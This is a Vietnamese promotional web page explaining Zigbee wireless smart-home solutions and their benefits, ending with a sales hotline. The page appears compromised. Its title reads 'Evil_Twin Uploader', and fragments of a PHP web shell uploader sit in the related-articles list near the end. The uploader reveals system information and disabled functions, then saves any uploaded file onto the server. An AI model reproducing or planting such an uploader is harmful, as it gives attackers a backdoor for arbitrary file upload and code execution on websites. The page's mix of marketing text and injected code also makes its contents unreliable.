Evil_Twin Uploader

Giải pháp nhà thông minh không dây sử dụng sóng Zigbee

Trong những năm gần đây mạng cảm biến không dây được phát triển và áp dụng rất mạnh vào đời sống hằng ngày trong rất nhiều các lĩnh vực khác nhau như điều khiển giao thông, giám sát môi trường, chăm sóc sức khỏe… một trong số đó có giải pháp nhà thông minh không dây sử dụng sóng Zigbee. Trong bài viết dưới đây mời các bạn cùng chúng tôi tìm hiểu về giải pháp đang được ứng dụng rất rộng rãi này.

Giải pháp nhà không dây thông minh sử dụng sóng Zigbee

Sóng Zigbee Là Gì?

Zigbee là một giao thức mạng không dây xây dựng trên tiêu chuẩn IEE 802.15.4 của tổ chức Institue of Electrical and Electronics Engineers. Là một loại sóng có tần số ngắn được áp dụng rộng rãi trong việc truyền tín hiệu của nhà thông minh, thiết bị y tế.

giải pháp nhà thông minh không dây

Sóng Zigbee có chi phí rẻ hơn nhiều so với mạng không dây cá nhân(WPAN) do có thiết kế đơn giản và không tiêu tốn nhiều điện năng.

Sóng Zigbee được phát triển để truyền tín hiệu trong hệ thống nhà thông minh ổn định hơn và tiết kiệm điện năng hơn các loại sóng như Wifi, Bluetooth, hồng ngoại…

Sóng Zigbee mang đến những lợi ích gì?

Ngày nay ứng dụng của sóng Zigbee khá rộng rãi đặc biệt là trong ngành công nghiệp tự động hóa và điện thông minh mới một số tính năng nổi bật dưới đây:

– Triển khai là lắp đặt dễ dàng: Việc thiết kế mô hình sóng Zigbee khá dễ dàng và thích hợp với nhiều thiết bị
– Kết nối Internet: Kết nối với các thiết bị điện bất kỳ đâu trên thế giới. Điều này cho phép bạn sử dụng smartphone để quản lý nhà thông minh
– Kiểm soát năng lượng: Đóng ngắt thiết bị hoạt động từ xa
– An ninh: Dễ dàng tích hợp và kết nối với hệ thống an ninh cho ngôi nhà
– Tiết kiệm điện năng: Sử dụng rất ít nguồn điện năng trong việc truyền tải điện

Nhà thông minh - Xu hướng tất yếu của xã hội hiện đại

Với những lợi ích kể trên đặc biệt là khả năng kết nối và vận hành thiết bị điện trong nhà vượt trội hơn sóng Wifi, Bluetooth hay hồng ngoại nên Zigbee là giải pháp nhà thông minh không dây được nhiều người tin dùng.

Ứng Dụng của Sóng Zigbee Vào Nhà Thông Minh

Ứng dụng của sóng Zigbee vào nhà thông minh là một giải pháp ưu việt. Với một căn hộ hay công trình nhà ở với diện tích không quá lớn (khoảng 100m2 trở xuống), bạn có thể xây lắp hệ thống điện thông minh không dây sử dụng sóng Zigbee. Với diện tích nhỏ và không quá nhiều lớp tường cũng như số lượng thiết bị điện không quá nhiều, sóng Zigbee sẽ đủ ổn định để vận hành ngôi nhà hiệu quả.

Ngày nay có rất nhiều giải pháp thông minh không dây sử dụng sóng Zigbee. Những thiết bị được ứng dụng sóng Zigbee như công tắc, ổ điện, thiết bị an ninh…. chúng đều có giá thành khá bình dân trên thị trường.

Với giải pháp nhà thông minh không dây sử dụng sóng Zigbee bạn hoàn toàn có thể làm chủ ngôi nhà của mình một cách đơn giản và dễ dàng, đáp ứng mọi nhu cầu của bạn một cách hợp lý và linh hoạt góp phần nâng cao chất lượng cuộc sống.

Để được tư vấn tốt nhất về các giải pháp nhà thông minh phù hợp với ngôi nhà của mình khách hàng vui lòng liên hệ với chúng tôi theo hotline: 024.6688.7518

Bài viết liên quan

 • Những lợi ích tuyệt vời của công tắc điện thông minh
 • Công tắc thông minh ZigBee – Thiết bị điện an toàn cho nhà thông minh
 • ".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
  DisablePHP=".$disable_functions; print "\n"; echo"
  "; echo"
  "; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
  Social media & sharing icons powered by UltimatelySocial